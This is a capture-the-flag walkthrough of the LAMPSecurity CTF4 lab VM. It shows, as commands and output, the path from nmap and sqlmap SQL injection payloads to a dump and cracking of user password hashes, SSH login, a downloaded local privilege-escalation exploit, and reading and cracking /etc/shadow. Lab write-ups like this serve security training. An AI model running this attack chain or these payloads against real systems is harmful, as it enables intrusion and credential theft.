Tango Down (CTF4) : Capture The Flag (CTF) 4 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf4,83/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

- Search the IP, start the VM, select the network to Host Only network, now we are aware the subnet used by host only, just run an nmapscan to identify the network IP.

We got the below IP and services :

Nmapscan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcpclosed ipp
MAC Address: 08:00:27:37:40:F6 (CadmusComputer Systems)


To confirm, Telnet on 25 port
root@kali:~# telnet 192.168.56.101 25

Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ctf4.sas.upenn.eduESMTPSendmail8.13.5/8.13.5; Sat, 24 Oct 2015 00:05:52 -0400
HELO
501 5.0.0 HELOrequires domain address
VRYroot
500 5.5.1 Command unrecognized: "VRYroot"
help
214-2.0.0 This is sendmailversion 8.13.5
214-2.0.0 Topics:
214-2.0.0 HELO EHLO MAIL RCPT DATA
214-2.0.0 RSET NOOP QUIT HELP VRFY
214-2.0.0 EXPN VERB ETRN DSN AUTH
214-2.0.0 STARTTLS
214-2.0.0 For more info use "HELP ".
214-2.0.0 To report bugs in the implementation send email to
214-2.0.0 sendmail-bugs@sendmail.org.
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
VRFYroot
250 2.1.5 <root@ctf4.sas.upenn.edu>

This is the host.

Now we will do further scanning and enumeration :

Port 80 :

A normal site seems to be hosted here, a static. Running niktoon this..




Vulnerability Assessment and Exploit :

Testing SQLInjection :
root@kali:~/vulhub/ct4# sqlmap-u http://192.168.56.101 --crawl=3
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150429}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmapfor attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:17:44

do you want to check for the existence of site's sitemap(.xml) [Y/n]
[01:17:46] [INFO] no links found
[01:17:46] [INFO] starting crawler
[01:17:46] [INFO] searching for links with depth 1
[01:17:46] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)]
[01:17:48] [WARNING] running in a single-thread mode. This could take a while
[01:17:48] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 3
[01:17:58] [INFO] starting 3 threads
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[01:18:00] [INFO] sqlmapgot a total of 8 targets
URL 1:
GET http://192.168.56.101:80/index.html?title=Home Page
do you want to test this URL? [Y/n/q]
>
[01:18:02] [INFO] testing URL 'http://192.168.56.101:80/index.html?title=Home Page'
[01:18:02] [INFO] using '/root/.sqlmap/output/results-10242015_0118am.csv' as the CSVresults file in multiple targets mode
[01:18:02] [INFO] testing connection to the target URL
[01:18:02] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:03] [INFO] target URL is stable
[01:18:03] [INFO] testing if GET parameter 'title' is dynamic
[01:18:03] [WARNING] GET parameter 'title' does not appear dynamic
[01:18:03] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[01:18:03] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to XSSattacks
[01:18:03] [INFO] testing for SQLinjection on GET parameter 'title'
[01:18:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:03] [WARNING] reflective value(s) found and filtering out
[01:18:03] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'PostgreSQLAND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'Microsoft SQLServer/SybaseAND error-based - WHERE or HAVING clause'
[01:18:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:04] [INFO] testing 'MySQLinlinequeries'
[01:18:04] [INFO] testing 'PostgreSQLinlinequeries'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybaseinlinequeries'
[01:18:04] [INFO] testing 'Oracle inlinequeries'
[01:18:04] [INFO] testing 'SQLiteinlinequeries'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:04] [INFO] testing 'PostgreSQL> 8.1 stacked queries'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybasestacked queries'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:04] [INFO] testing 'MySQL> 5.0.11 AND time-based blind'
[01:18:04] [INFO] testing 'PostgreSQL> 8.1 AND time-based blind'
[01:18:04] [INFO] testing 'Microsoft SQLServer/Sybasetime-based blind'
[01:18:04] [INFO] testing 'Oracle AND time-based blind'
[01:18:04] [INFO] testing 'MySQLUNION query (NULL) - 1 to 10 columns'
[01:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:05] [WARNING] using unescapedversion of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:06] [WARNING] GET parameter 'title' is not injectable
[01:18:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 2:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog
do you want to test this URL? [Y/n/q]
>
[01:18:12] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog'
[01:18:12] [INFO] testing connection to the target URL
[01:18:12] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:13] [INFO] target URL is stable
[01:18:13] [INFO] testing if GET parameter 'page' is dynamic
[01:18:13] [INFO] confirming that GET parameter 'page' is dynamic
[01:18:13] [INFO] GET parameter 'page' is dynamic
[01:18:13] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[01:18:13] [INFO] testing for SQLinjection on GET parameter 'page'
[01:18:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'PostgreSQLAND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Microsoft SQLServer/SybaseAND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:13] [INFO] testing 'MySQLinlinequeries'
[01:18:13] [INFO] testing 'PostgreSQLinlinequeries'
[01:18:13] [INFO] testing 'Microsoft SQLServer/Sybaseinlinequeries'
[01:18:13] [INFO] testing 'Oracle inlinequeries'
[01:18:13] [INFO] testing 'SQLiteinlinequeries'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:13] [INFO] testing 'PostgreSQL> 8.1 stacked queries'
[01:18:13] [INFO] testing 'Microsoft SQLServer/Sybasestacked queries'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:13] [INFO] testing 'MySQL> 5.0.11 AND time-based blind'
[01:18:13] [INFO] testing 'PostgreSQL> 8.1 AND time-based blind'
[01:18:14] [INFO] testing 'Microsoft SQLServer/Sybasetime-based blind'
[01:18:14] [INFO] testing 'Oracle AND time-based blind'
[01:18:14] [INFO] testing 'MySQLUNION query (NULL) - 1 to 10 columns'
[01:18:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:14] [WARNING] using unescapedversion of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:15] [WARNING] GET parameter 'page' is not injectable
[01:18:15] [INFO] skipping previously processed GET parameter 'title'
[01:18:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=research&title=Research'
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=contact&title=Contact'
URL 3:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2
do you want to test this URL? [Y/n/q]
>
[01:18:19] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2'
[01:18:19] [INFO] testing connection to the target URL
[01:18:19] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:19] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:20] [INFO] target URL is stable
[01:18:20] [INFO] skipping previously processed GET parameter 'page'
[01:18:20] [INFO] skipping previously processed GET parameter 'title'
[01:18:20] [INFO] testing if GET parameter 'id' is dynamic
[01:18:20] [INFO] confirming that GET parameter 'id' is dynamic
[01:18:20] [INFO] GET parameter 'id' is dynamic
[01:18:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:18:20] [INFO] testing for SQLinjection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[01:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:39] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:18:39] [INFO] testing 'MySQL>= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 AND error-based - WHERE or HAVING clause (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQL>= 4.1 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.0 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 OR error-based - WHERE or HAVING clause (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQL>= 4.1 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQLOR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - PROCEDURE ANALYSE(EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.0 error-based - Parameter replace'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL>= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL>= 5.5 error-based - Parameter replace (BIGINTUNSIGNED)'
[01:18:39] [INFO] testing 'MySQLinlinequeries'
[01:18:39] [INFO] testing 'MySQL> 5.0.11 stacked queries'
[01:18:39] [WARNING] time-based comparison requires larger statistical model, please wait..
[01:18:39] [INFO] testing 'MySQL< 5.0.12 stacked queries (heavy query)'
[01:18:39] [INFO] testing 'MySQL> 5.0.11 AND time-based blind (SELECT)'
[01:18:49] [INFO] GET parameter 'id' seems to be 'MySQL> 5.0.11 AND time-based blind (SELECT)' injectable
[01:18:49] [INFO] testing 'MySQLUNION query (NULL) - 1 to 20 columns'
[01:18:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:18:49] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:18:49] [INFO] target URL appears to have 5 columns in query
[01:18:49] [INFO] GET parameter 'id' is 'MySQLUNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmapidentified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 6954=6954

Type: UNION query
Title: MySQLUNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,CONCAT(0x716b707171,0x69637369434f4f546370,0x71707a7671),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))VbJV)
---
do you want to exploit this SQLinjection? [Y/n]
[01:19:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP5.1.2
back-end DBMS: MySQL5.0.11
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=5'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=6'
[01:19:18] [INFO] skipping 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=7'
[01:19:18] [INFO] you can find results of scanning in multiple targets mode inside the CSVfile '/root/.sqlmap/output/results-10242015_0118am.csv'

[*] shutting down at 01:19:18


Took a database dump for the user accounts and hashes :
sqlmap-u http://192.168.56.101 --crawl=5 --dbms=mysql--dump --threads=5


+++ Truncated O/p+++
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:31:14] [INFO] writing hashes to a temporary file '/tmp/sqlmap_bywwj4272/sqlmaphashes-lLP7FS.txt'
do you want to crack them via a dictionary-based attack? [y/N/q]
Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+----------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6 | ghighland| 9f3eb3087298ff21843cc4e013cf355f |+---------+-----------+----------------------------------+


++++++++++++++++

Cracking the hashes for the accounts :

1.iliketosurf






2. achen: seventysixers
3.pmoore: Homesite
4.jdurbin: Sue1978
5.sorzek: pacman6.ghighland: undone1

So we have all the SQLUsernamesand password now !


From Nikto we found some more paths :
==============================================
root@kali:~/vulhub/ct4# nikto-h http://192.168.56.101
- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-24 01:16:56 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.0 (Fedora)
+ Retrieved x-powered-by header: PHP/5.1.2
+ The anti-clickjackingX-Frame-Options header is not present.
+ Server leaks inodesvia ETags, header found with file /robots.txt, inode: 487720, size: 104, mtime: Tue Dec 9 23:39:44 2014
+ File/dir'/mail/' in robots.txtreturned a non-forbidden or redirect HTTP code (302)
+ File/dir'/conf/' in robots.txtreturned a non-forbidden or redirect HTTP code (500)
+ OSVDB-3268: /sql/: Directory indexing found.
+ File/dir'/sql/' in robots.txtreturned a non-forbidden or redirect HTTP code (200)
+ File/dir'/admin/' in robots.txtreturned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.0 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuctionmay allow user adminaccounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-682: /usage/: Webalizermay be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /pages/: Directory indexing found.
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Adminlogin page/section found.+ 7500 requests: 1 error(s) and 30 item(s) reported on remote host

+ End Time: 2015-10-24 01:17:32 (GMT1) (36 seconds)
---------------------------------------------------------------------------


Trying login using the user / password we gathered from previous sqlmapstep :







Login successfull, but do not see any adminconsole, lets try other logins..


To Gain Shell :

First step, lets try to find a shell to the host. We defaced multiple user / password above, lets try to use some ids..

I randomly picked "achen" , and it works !!, I have shell now.

root@kali:~/vulhub/ct4# ssh achen@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSAkey fingerprint is e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@192.168.56.101's password:
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ id
uid=501(achen) gid=501(achen) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t
[achen@ctf4 ~]$ uname-a
Linux ctf4.sas.upenn.edu2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[achen@ctf4 ~]$ cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

[achen@ctf4 ~]$

Privilege Escalation :
After a lot of research, I got this : http://www.securityfocus.com/bid/18874/exploit. Downloaded and copied the exploit onto the victim host.




On the victim node, gave exec permissions and then ran the exploit script :


[achen@ctf4 ~]$ chmod+x zmia-jul14-2006.sh

[achen@ctf4 ~]$ ./zmia-jul14-2006.sh
wait aprox4 min to get sh

sh-3.1# id
uid=0(root) gid=0(root) groups=100(users),501(achen),507(admins) context=user_u:system_r:unconfined_t


We are ROOT

Observation:

OS:
sh-3.1# cat /etc/issue
Fedora Core release 5 (Bordeaux)
Kernel \r on an \m

You have new mail in /var/spool/mail/achen

sh-3.1# uname-a
Linux ctf4.sas.upenn.edu2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux


Passwords :
sh-3.1# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahidaemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:PortmapperRPCuser:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
ossec:x:506:508::/var/ossec:/sbin/nologin
ossecm:x:507:508::/var/ossec:/sbin/nologin
ossecr:x:508:508::/var/ossec:/sbin/nologin


sh-3.1# cat /etc/shadow
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:14309:0:99999:7:::
bin:*:14309:0:99999:7:::
daemon:*:14309:0:99999:7:::
adm:*:14309:0:99999:7:::
lp:*:14309:0:99999:7:::
sync:*:14309:0:99999:7:::
shutdown:*:14309:0:99999:7:::
halt:*:14309:0:99999:7:::
mail:*:14309:0:99999:7:::
news:*:14309:0:99999:7:::
uucp:*:14309:0:99999:7:::
operator:*:14309:0:99999:7:::
games:*:14309:0:99999:7:::
gopher:*:14309:0:99999:7:::
ftp:*:14309:0:99999:7:::
nobody:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
rpm:!!:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
distcache:!!:14309:0:99999:7:::
ntp:!!:14309:0:99999:7:::
nscd:!!:14309:0:99999:7:::
vcsa:!!:14309:0:99999:7:::
webalizer:!!:14309:0:99999:7:::
dovecot:!!:14309:0:99999:7:::
mysql:!!:14309:0:99999:7:::
netdump:!!:14309:0:99999:7:::
pcap:!!:14309:0:99999:7:::
avahi:!!:14309:0:99999:7:::
named:!!:14309:0:99999:7:::
mailnull:!!:14309:0:99999:7:::
smmsp:!!:14309:0:99999:7:::
haldaemon:!!:14309:0:99999:7:::
rpc:!!:14309:0:99999:7:::
xfs:!!:14309:0:99999:7:::
gdm:!!:14309:0:99999:7:::
rpcuser:!!:14309:0:99999:7:::
nfsnobody:!!:14309:0:99999:7:::
sshd:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
ossec:!!:14312:0:99999:7:::
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::

NetstatOutput
sh-3.1# netstat-aActive Internet connections (servers and established)
ProtoRecv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:58194 *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:https *:* LISTEN


sh-3.1# df-kl
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
2888460 1757260 982108 65% /
/dev/hda1 101086 9967 85900 11% /boot
tmpfs 1038136 0 1038136 0% /dev/shm

sh-3.1# mount
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
procon /proctype proc(rw)
sysfson /sys type sysfs(rw)
devptson /dev/ptstype devpts(rw,gid=5,mode=620)
/dev/hda1 on /boot type ext3 (rw)
tmpfson /dev/shmtype tmpfs(rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpcon /var/lib/nfs/rpc_pipefstype rpc_pipefs(rw)
automount(pid1528) on /net type autofs(rw,fd=4,pgrp=1528,minproto=2,maxproto=4)


Now as we have a privileged access to the system and access to the shadow and passwdfile, we can crack the root password :
root@kali:~/vulhub/ct4# unshadowpasswdshadow > unshadow.txt
root@kali:~/vulhub/ct4# greproot unshadow.txt> root.txt
root@kali:~/vulhub/ct4# cat root.txt
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:0:0:root:/root:/bin/bash

root@kali:~/vulhub/ct4# john root.txt
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
root1234 (root)
guesses: 1 time: 0:00:00:00 DONE (Tue Oct 27 19:59:06 2015) c/s: 4320 trying: Root888 - root7777
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ct4# john --show root.txt
root:root1234:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left